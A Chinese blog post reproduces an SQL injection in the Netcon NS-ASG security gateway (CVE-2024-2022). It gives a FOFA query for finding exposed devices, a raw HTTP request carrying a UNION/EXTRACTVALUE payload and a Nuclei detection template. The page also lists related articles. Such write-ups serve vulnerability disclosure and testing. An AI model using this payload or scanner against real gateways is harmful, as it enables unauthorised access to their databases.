网康应用安全网关(NS-ASG)-list_ipAddressPolicy-SQL注入漏洞(CVE-2024-2022)复现

最新推荐文章于 2024-05-03 16:49:47 发布
最新推荐文章于 2024-05-03 16:49:47 发布
阅读量421 收藏 6
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 漏洞复现 渗透测试 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42277564/article/details/136642499
版权

一、漏洞信息

漏洞名称:

网康应用安全网关(NS-ASG)-list_ipAddressPolicy-SQL注入漏洞

漏洞类别: SQL注入漏洞

风险等级: 高危

二、漏洞描述

网康应用安全网关(NS-ASG) list_ipAddressPolicy 接口存在SQL注入漏洞。
攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。

三、影响范围

网康应用安全网关(NS-ASG) 

四、漏洞复现

FOFA:app="网康-NS-ASG-应用安全网关"

POC:

GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

五、脚本

id: CVE-2024-2022

info:
  name: 网康NS-ASG应用安全网关sql注入漏洞
  severity: high
  author: tt
  metadata:
    max-request: 1
    fofa-query: app="网康科技-NS-ASG安全网关"
    verified: true
requests:
  - raw:
      - |+
        GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(123456)),0x7e)) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'e10adc3949ba59abbe56e057f20f883e')"

selecthch
关注
  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
terraform-aws-asg:Terraform AWS Auto Scaling堆栈
02-04
Terraform AWS Auto Scaling模块 支持将Auto Scaling组的多个部署方案部署到AWS VPC的模块堆栈。 先决条件 预先配置的AWS VPC 要求 Terraform 0.8.0或更高版本 AWS提供商 组模块 组模块将提供安全组,启动配置和自动扩展组资源。 ELB和简单组配置均受支持。 输入变量 资源标签 stack_item_fullname此堆栈项目的长格式描述性名称。 此值用于为此堆栈项创建的资源创建应用程序资源标记。 stack_item_label此堆栈的简短形式标识符。 此值用于为此堆栈项创建的资源创建“名称”资源标签,并且还用作重使用的唯一
endurox-go:Go应用程序服务器(ASG)
03-14
GO应用程序服务器(ASG) 版本:2.0.0-使用对象模式API。 ASG是Golang的应用程序服务器,它可以处理Golang中的分布式事务。 可以在不中断服务的情况下重新加载应用程序组件。 基本上,系统是面向服务的,服务器组件在其中通告服务(服务只是一个文字名称,例如“ GETBALANCE”,“ TRXREQ”等),然后这些服务由客户端二进制文件调用。 客户端和服务器可以位于不同的物理机器上,并且它们可以在不知道其心理位置的情况下相互呼叫。 由于这些服务器二进制文件是无状态的,因此可以启动多个副本。 这确保了容错处理。 客户端和服务器服务通过中间件进行通信,该中间件支持三种用于请求/响应数据的缓冲区:任意字符串,字节数组,统一缓冲区格式(UBF),JSON缓冲区。 建立和测试状态 作业系统 状态 作业系统 状态 作业系统 状态 RHEL / Oracle Linux 8 Ce
terraform-aws-asg-dns-handler:Terraform模块,用于根据AWS Auto Scaling组中实例上的模式动态设置主机名
02-04
ASG DNS处理程序 目的 这个Terraform模块设置了在由AWS Auto Scaling Groups(ASG)生成的实例上按照特定模式动态设置主机名所需的所有内容。 在了解有我们构建此模块的动机的更多。 要求 0.12+ 2.0+ 用法 创建一个ASG并设置asg:hostname_pattern标签,例如: asg-test-#instanceid.asg-handler-vpc.testing@Z3QP9GZSRL8IVA 可以像这样在Terraform中插值: tag { key = " asg:hostname_pattern
aws-chaos-scripts:在AWS基础设施上运行故障注入的python脚本集合
01-30
免责声明 :warning_selector: 自行承担使用风险 :warning_selector: 使用这些脚本可能会造成不合理的风险。 如果您选择在自己的活动中使用此处提供的脚本,则后果自负。 任何作者或贡献者,或与这些脚本相联的任何其他人,概不对您使用此存储库中包含的脚本负责。 仅在了解代码功能之后,才使用这些脚本 收集Python脚本以将故障注入AWS基础架构 script-fail-az:模拟VPC中可用区(AZ)的丢失。 ❯ script-fail-az --help usage: script-fail-az [-h] --region REGION --vpc-id VPC_ID --az-name AZ_NAME [--duration DURATION] [--limit-asg] [--failover-rds] [--failover-elasticache] [--log-level LOG_LEVEL] Simulate AZ failure: associate subne
应用安全网NS-ASG-index-RCE
qq_39342001的博客
03-17 211
【代码】应用安全网NS-ASG-index-RCE。
漏洞科技 NS-ASG 应用安全网 SQL注入漏洞(CVE-2024-2022)
weixin_52204925的博客
03-07 686
科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
TPLink-NGFW-GWLB-ASG-v3.1_CJ.yml
07-12
TPLink-NGFW-GWLB-ASG-v3.1_CJ.yml
NS-ASG应用安全网 SQL注入漏洞
weixin_45490166的博客
03-12 136
NS-ASG应用安全网存在SQL注入漏洞。app=“NS-ASG应用安全网
漏洞应用安全网(NS-ASG)-list_ipAddressPolicy-SQL注入(CVE-2024-2022)
知黑而守白
03-07 83
应用安全网(NS-ASG)是一款软硬件一体化、性能卓越、集SSL与IPSec于一体的应用安全接入产品。它不仅从全链条上保障业务访问的安全性,还以极其简单的方式适配所有移动终端,更有多种链路均衡和选择技术保障使用体验。应用安全网(NS-ASG) list_ipAddressPolicy 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
科技 NS-ASG 应用安全网 SQL注入漏洞(CVE-2024-2022)
wan___she__pi的博客
03-26 594
科技的NS-ASG 应用安全网是一种络设备,旨在保护企业的络和应用免受各种络威胁和攻击。它结合了防火墙、入侵检测和防御系统(IDS/IPS)、反病毒、反垃圾邮件、VPN(虚拟专用络)等功能,提供全面的应用层安全保护。科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,造成数据库信息泄露。
NS-ASG应用安全网list_ipAddressPolicy.php sql注入CVE-2024-2022)
weixin_43567873的博客
03-07 168
NS-ASG应用安全网list_ipAddressPolicy.php sql注入CVE-2024-2022)
[转]信息安全相理论题(四)
热门推荐
Herry_Lee的专栏
02-18 3万+
26、____表示邮件服务器返回代码为临时性失败(xx代表任意数)。 A、 2xx B、 3xx C、 4xx D、 5xx 您的答案: 标准答案: C 27、买家称购买商品异常后的正确操作是立即咨询官方客服。 A、 正确 B、 错误 您的答案: 标准答案: A 28、上陌生人给你发送补丁文件正确的操作是不下载文件。 A、 错误 B、 正确 您的答...
逻辑漏洞:水平越权、垂直越权靶场练习
qq_68163788的博客
05-02 929
水平越权和垂直越权是组织中常见的管理问题,指的是员工在组织中所拥有的权力和责任超出其职位所应具备的范围。 水平越权是指员工在同一级别的职位上超越了其同事的权力和责任范围,通常表为某个员工在团队中承担了过多的任务或权力,导致其他同事感到不公平或不满。 垂直越权则是指员工在组织中超越了其职位等级的权力和责任范围,通常表为员工在没有得到上级批准的情况下做出决策或行动,可能会导致组织内部的混乱和冲突。
软件应用开发安全设计指南
最新发布
weixin_41039677的博客
05-03 311
在设计系统架构时,要充分考虑各种安全威胁,如DDoS攻击、SQL注入、跨站脚本攻击(XSS)等,并采取相应的防护措施。设计时要充分考虑到系统架构的稳固性、可维护性和可扩展性,以确保系统在面对各种安全威胁时能够稳定运行。设计审计和日志记录功能,以记录系统的活动和事件,为安全审计和故障排除提供依据。对络通讯进行严格的身份验证和访问控制,防止未经授权的访问和数据泄露。在设计软件功能时,要充分考虑功能的安全性,避免引入潜在的安全漏洞。限制对存储设备的物理访问权限,防止未经授权的访问和数据篡改。
创造未来知识管理新篇章:Ollama与AnythingLLM联手打造个人与企业的安全知识库!
跟着大数据和AI去旅行
04-30 1147
Ollama是一个开源的大型语言模型服务工具,它帮助用户快速在本地运行大模型。通过简单的安装指令,用户可以执行一条命令就在本地运行开源大型语言模型,如Llama 2。Ollama极大地简化了在Docker容器内部署和管理LLM的过程,使得用户能够快速地在本地运行大型语言模型。打造个性化聊天机器人:用Ollama和Open WebUI搭建你的私有ChatGPT!windows 下 docker compose 安装 ollama 和 open-webui ,打造私有GPT。
校园安全升级:AR实景监测场景方案
lxzn123的博客
04-29 647
数据融合视频直观呈:利用增强实技术,将校园资源数据以标签形式融合到视频画面中,实统筹管理,真正做到所见即所得,提升业务可视化管理水平。- 全景监控与细节兼顾:通过高点全局监控与低点细节查看的结合,实全景与低空监控的联动,打造出实景式、立体化的全局防控体系。- 数据展示不直观:校园内的重点场所,如校门、广场、教学楼和图书馆等,其资源详细数据的展示并不直观,无法快速定位和查看。- 传统监控的局限性:传统的校园监控系统多采用窗口监控模式,这种模式视野范围有限,画面分散,缺乏全局视角和重点监控。
Linux系统安全及应用(1)
煤五千的博客
04-26 1304
usermod -s /sbin/nologin 用户名usermod-L用户名passwd-S用户名passwd-用户名userdel [-r]用户名。
企业如何保证内部传输文件使用的工具是安全的?
镭速的博客
04-28 836
企业内部文件的频繁交换成为了日常运营不可或缺的一环。然而,随着数据量的爆炸式增长和络攻击手段的日益杂,内文件传输的安全隐患也日益凸显,成为企业信息安全的薄弱环节。本文将探讨的安全风险、企业常用的防护措施。
汇编代码_sub_3E99E3: .asmfunc .asg 0, var_0 .asg -2, var_2 .asg -5, var_5 .asg -6, var_6 .asg -7, var_7 .asg -8, var_8 .asg -9, var_9 .asg -0Ah, var_A .asg -0Bh, var_B .asg -0Ch, var_C .asg -0Dh, var_D .asg -0Eh, var_E .asg -0Fh, var_F .asg -10h, var_10 .asg -11h, var_11 .asg -12h, var_12 addb SP,#20转成C语言应该如何定义变量
07-08
根据给出的汇编代码,可以将其转换为以下的C语言定义变量: ```c char var_0; short var_2; char var_5; char var_6; char var_7; char var_8; char var_9; char var_A; char var_B; char var_C; char var_D; char var_E; char var_F; char var_10; char var_11; char var_12; ``` 这里假设在汇编代码中使用的 `.asg` 指令是用于定义变量并为其分配内存空间的指令。根据 `.asg` 指令后面的指定值,我们可以确定每个变量的数据类型和相应的大小。请注意,这里将所有的变量都定义为 `char` 类型,因为它们在汇编代码中被分配的大小都是一个字节。如有必要,你可以根据实际情况调整变量的数据类型。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值